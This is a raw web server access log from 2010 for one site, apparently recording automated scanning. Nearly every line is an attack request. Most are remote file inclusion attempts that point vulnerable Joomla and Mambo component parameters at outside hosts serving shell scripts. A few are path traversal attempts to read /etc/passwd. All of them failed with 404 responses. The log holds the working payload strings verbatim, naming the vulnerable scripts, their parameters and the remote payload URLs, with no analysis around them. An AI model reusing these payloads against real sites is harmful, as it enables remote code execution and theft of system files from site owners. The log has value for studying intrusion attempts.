116.127.121.117 - - [28/Feb/2010:22:26:26 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:26:37 -0800] "GET /logs/access_091221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:27:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:27:11 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:27:11 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:27:27 -0800] "GET /logs/access_091221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:22:28:18 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:22:28:18 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:22:28:18 -0800] "GET /logs/access_091221.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:28:46 -0800] "GET /logs/access_100111.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:22:28:53 -0800] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:29:05 -0800] "GET /logs/access_100111.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:11 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:11 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.127.121.117 - - [28/Feb/2010:22:31:17 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:31:52 -0800] "GET /logs/access_091123.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:31:52 -0800] "GET /mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:31:52 -0800] "GET /logs//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:32:32 -0800] "GET /logs/access_091012.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:32:41 -0800] "GET /logs/access_100208.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:32:41 -0800] "GET /logs/access_090831.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:32:41 -0800] "GET /logs/access_090907.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:32:41 -0800] "GET /logs/access_100222.log%20%20//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:22:32:56 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:33:31 -0800] "GET /logs//mcf.php?content=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:33:31 -0800] "GET /mcf.php?content=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:36:38 -0800] "GET /logs/access_100208.log%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:36:38 -0800] "GET /logs/access_100208.log%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:48 -0800] "GET /main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:48 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:48 -0800] "GET /logs//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:48 -0800] "GET /logs/access_091116.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:53 -0800] "GET /logs/access_100111.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:53 -0800] "GET /logs/access_090921.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:53 -0800] "GET /logs/access_100222.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:36:53 -0800] "GET /logs/access_091207.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:01 -0800] "GET /logs/access_100118.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:01 -0800] "GET /logs/access_091102.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:01 -0800] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:06 -0800] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:16 -0800] "GET /main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:16 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:16 -0800] "GET /logs//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:16 -0800] "GET /logs/access_091116.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_091207.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_091123.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_090907.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_091012.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_090817.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_091109.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:39 -0800] "GET /logs/access_090921.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:47 -0800] "GET /logs/access_100111.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:47 -0800] "GET /logs/access_100222.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:47 -0800] "GET /logs/access_091207.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:47 -0800] "GET /logs/access_090921.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:47 -0800] "GET /logs/access_100118.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:48 -0800] "GET /logs/access_091102.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:52 -0800] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:52 -0800] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:52 -0800] "GET /logs/access_090810.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:37:52 -0800] "GET /logs/access_090831.log//mcf.php?content=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:18 -0800] "GET /logs/access_090928.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:18 -0800] "GET /logs/access_100208.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:18 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:28 -0800] "GET /logs/access_090928.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:28 -0800] "GET /logs/access_100208.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:38:28 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:22:38:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
208.80.193.29 - - [28/Feb/2010:22:40:07 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:39 -0800] "GET /logs/access_091123.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:39 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:39 -0800] "GET /logs/access_090907.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:42 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:42 -0800] "GET /logs/access_090907.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:42 -0800] "GET /logs/access_091123.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:50 -0800] "GET /logs/access_090928.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:40:53 -0800] "GET /logs/access_090928.log//main.php?sayfa=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:01 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:01 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:01 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:05 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:05 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /logs/access_091221.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /logs/access_091221.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:42:28 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:22:47:21 -0800] "GET /logs//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:22:47:21 -0800] "GET /component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:22:47:21 -0800] "GET /logs/access_100111.log%20%20//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /logs/access_091221.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:48:03 -0800] "GET /logs/access_091221.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:07 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:07 -0800] "GET /logs/access_091207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:48:25 -0800] "GET /logs/access_091207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.119.216.146 - - [28/Feb/2010:22:48:53 -0800] "GET /logs/access_100215.log%20%20//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.137.162 - - [28/Feb/2010:22:50:05 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.39.137.162 - - [28/Feb/2010:22:50:08 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:18 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:18 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:18 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:22 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:22 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [28/Feb/2010:22:51:22 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:06 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:06 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:06 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:22:52:18 -0800] "GET /logs/access_091207.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
